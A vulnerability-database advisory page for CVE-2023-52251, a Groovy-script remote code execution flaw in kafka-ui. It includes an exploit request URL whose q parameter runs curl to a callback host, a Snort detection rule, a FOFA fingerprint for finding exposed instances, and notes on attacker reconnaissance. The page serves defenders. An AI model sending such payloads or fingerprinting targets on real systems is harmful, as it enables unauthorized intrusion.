cbcvebase.
CVE-2023-52251
published 2024-01-25

CVE-2023-52251: An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of…

PriorityP189high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
85.02%
99.7th percentile
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.

Affected

1 ranges
VendorProductVersion rangeFixed in
provectusui0.4.0 – 0.7.1

Detection & IOCsextracted from sources · hover to see the quote

url/api/clusters/local/topics/{topic}/messages
url/api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING
otherfilterQueryType=GROOVY_SCRIPT
otherfofa-query: icon_hash="-1477045616"
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Apache Kafka UI Unsanitized Groovy Script Filter Remote Code Execution Attempt (CVE-2023-52251)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/api/clusters/"; startswith; content:"/topics/"; within:50; content:"/messages?q|3d 22|"; within:50; content:"|28 29 26|filterQueryType|3d|GROOVY_SCRIPT"; distance:0; fast_pattern; reference:url,attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251; reference:cve,2023-52251; classtype:attempted-admin; sid:2050499; rev:2; metadata:affected_product Apache_Kafka, attack_target Web_Server, created_at 2024_01_25, cve CVE_2023_52251, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, updated_at 2024_03_08, reviewed_at 2024_10_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit requests are HTTP GET to the path /api/clusters/<name>/topics/<topic>/messages with the query parameter `q` containing a Groovy script payload (e.g. new ProcessBuilder(...).start()) and `filterQueryType=GROOVY_SCRIPT`.
  • The Snort/ET rule keys on the URI pattern: starts with /api/clusters/, followed within 50 bytes by /topics/, then /messages?q= (hex 3d 22), then the byte sequence (hex 28 29 26) followed by filterQueryType=GROOVY_SCRIPT. SID 2050499.
  • Successful exploitation produces the string 'Assigning partitions' in the HTTP response body; this can be used as a confirmation matcher.
  • Attackers first enumerate /api/clusters to discover the cluster name, then /api/clusters/<name>/topics to discover a topic name, before launching the injection — monitor for this reconnaissance sequence.
  • Kafka UI instances can be fingerprinted via FOFA using the icon hash -1477045616 to identify exposed targets.
  • ·The NVD description references the cluster name 'local' in the path, but the actual exploit dynamically enumerates the real cluster name from /api/clusters — detections hard-coded to 'local' may miss attacks against differently-named clusters.
  • ·The vulnerability affects Kafka UI versions 0.4.0 through 0.7.1 inclusive; version 0.7.2 and later are not affected.
  • ·The ET Snort rule (SID 2050499) requires SSL/TLS decryption (deployment SSLDecrypt) to fire on HTTPS-protected Kafka UI instances.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.